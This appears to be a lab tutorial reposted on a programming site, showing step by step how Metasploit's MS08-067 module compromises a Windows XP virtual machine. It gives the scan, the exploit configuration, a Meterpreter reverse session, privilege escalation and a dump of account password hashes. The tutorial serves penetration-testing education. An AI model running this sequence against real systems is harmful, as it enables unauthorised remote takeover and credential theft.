MS08-067 vulnerability remote overflow intrusion test

tags: Safety

The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability." If a user receives a specially crafted RPC request on an affected system, the vulnerability may allow remote code execution. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, attackers may use this vulnerability to run arbitrary code without authentication. This vulnerability can be used to carry out worm attacks.
The following experiment is a local test environment, a Kali host attack machine, and a Windows Xp target machine
Kali attack machine: 192.168.34.220
windows Xp: 192.168.34.189

Step one, start postgresql

root@kali:~# /etc/init.d/postgresql restart
[ ok ] Restarting PostgreSQL 9.1 database server: main.
 Step two, start metasploit
root@kali:~# /etc/init.d/metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! 
                 ;@'. __*__,."    |--- _____________/
                  '(.,...."/
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.11.4-2015071402                   ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Step 3: Check the data connection status

msf > db_status 
[*] postgresql connected to msf3

Step 4. Start nmap scan

msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: Host is up (0.0082s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT     STATE SERVICE         VERSION
[*] Nmap: 25/tcp   open  smtp            Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp   open  http            Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp  open  msrpc           Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 443/tcp  open  https?
[*] Nmap: 445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp  open  multiling-http?
[*] Nmap: 1025/tcp open  msrpc           Microsoft Windows RPC
[*] Nmap: 6002/tcp open  http            SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open  afs3-callback?
[*] Nmap: 7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: SF-Port777-TCP:V=6.47%I=7%D=9/24%Time=56039AF6%P=x86_64-unknown-linux-gnu%
[*] Nmap: SF:r(Kerberos,5,"x01txe0x06")%r(SMBProgNeg,5,"x01txe0x06")%r(T
[*] Nmap: SF:erminalServer,A,"x01txe0x06x01txe0x06")%r(WMSRequest,5,"x0
[*] Nmap: SF:1txe0x06");
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds

Step 5, search for vulnerability modules

msf > search ms08-067
Matching Modules
================
   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
Step 6, view configuration options
msf exploit(ms08_067_netapi) > show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

Step seven, configuration parameters

msf exploit(ms08_067_netapi) > set RHOST 192.168.34.189
RHOST => 192.168.34.189
msf exploit(ms08_067_netapi) > show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.34.189   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.34.189   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
Step 8. Start using
msf exploit(ms08_067_netapi) > exploit 
[*] Started reverse handler on 192.168.34.220:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.34.189
[*] Meterpreter session 1 opened (192.168.34.220:4444 -> 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800
 Step 9: Return to the shell successfully, the operation of meterpreter
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).hashdump 

meterpreter > hashdump 
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::meterpreter > shell 
Process 3368 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.34.189
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.34.254
C:WINDOWSsystem32>net user
net user
User accounts for \
-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant            
IUSR_DH-CA8822AB9589     IWAM_DH-CA8822AB9589     SUPPORT_388945a0         
The command completed with one or more errors.

For the target drone in the shared content, please search on Baidu.

Intelligent Recommendation

MS08-067 vulnerability reproduction experiment

MS08-067 vulnerability reproduction experiment Realize environment preparation: Attack machine: kali (IP: 192.168.153.129) Target drone: Windows XP (IP: 192.168.153.128) Attack tools: metasploit-frame...

MS08-067 vulnerability attack practice

Metasploit ms08_067 vulnerability attack practice Environmental preparation Two virtual machines, one is kali, as an attacker, and the other is windows xp sp3 Host IP kali 192.168.78.145 windows xp sp...

MS08-067 Vulnerability Analysis and Reclaim

A vulnerability recovery experiment made by a network space security professional student, if there is a mistake or improvement, please advise. MS08-067 Vulnerability Analysis and Reclaim content MS08...

Introduction and Exploitation of MS08-067 Vulnerability

The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: various versions of Windows 2000/XP/Server 2003/Vista/Server 2008, and even Windows 7 Pro-Beta in...

Windows Vulnerability: MS08-067 Remote Code Execution Vulnerability Reunifies and Deep Defense

Summary:Detailed explanation MS08-067 Remote Code Perform Vulnerability (CVE-2008-4250) and defense process This article shares from Huawei Yunshi District "Windows Vulnerability Utilization MS08...

More Recommendation

445 overflow port MS08-067 take cmdshell

(For testing only, but now it can not be used Reprinted from: http: //www.cnhonkerarmy.com/thread-167512-1-1.html) Detailed Vulnerability:               44...

MS08-067 RPC request buffer overflow exploit

table of Contents Vulnerability description Influence system Vulnerability detection Exploit Vulnerability hardening Vulnerability description   A remote code execution vulnerability exists ...

ms08-067 vulnerability target machine configuration

This vulnerability of ms08-067 is one of the most basic vulnerabilities when we are learning msf. Many tutorials will mention this vulnerability, but this vulnerability is very picky about the reprodu...

MS08-067 vulnerability penetration attack process

lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...

[Windows] MS08-067 - Windows remote command execution vulnerability (CVE-2008-4250)

Vulnerability CVE-2008-4250 Microsoft No. MS08-067, according to Microsoft Security Vulnerability Announcement, Basic understanding of its principles: MS08-067 Vulnerability is triggered by calling th...

Copyright  DMCA © 2018-2026 - All Rights Reserved - www.programmersought.com  User Notice

Top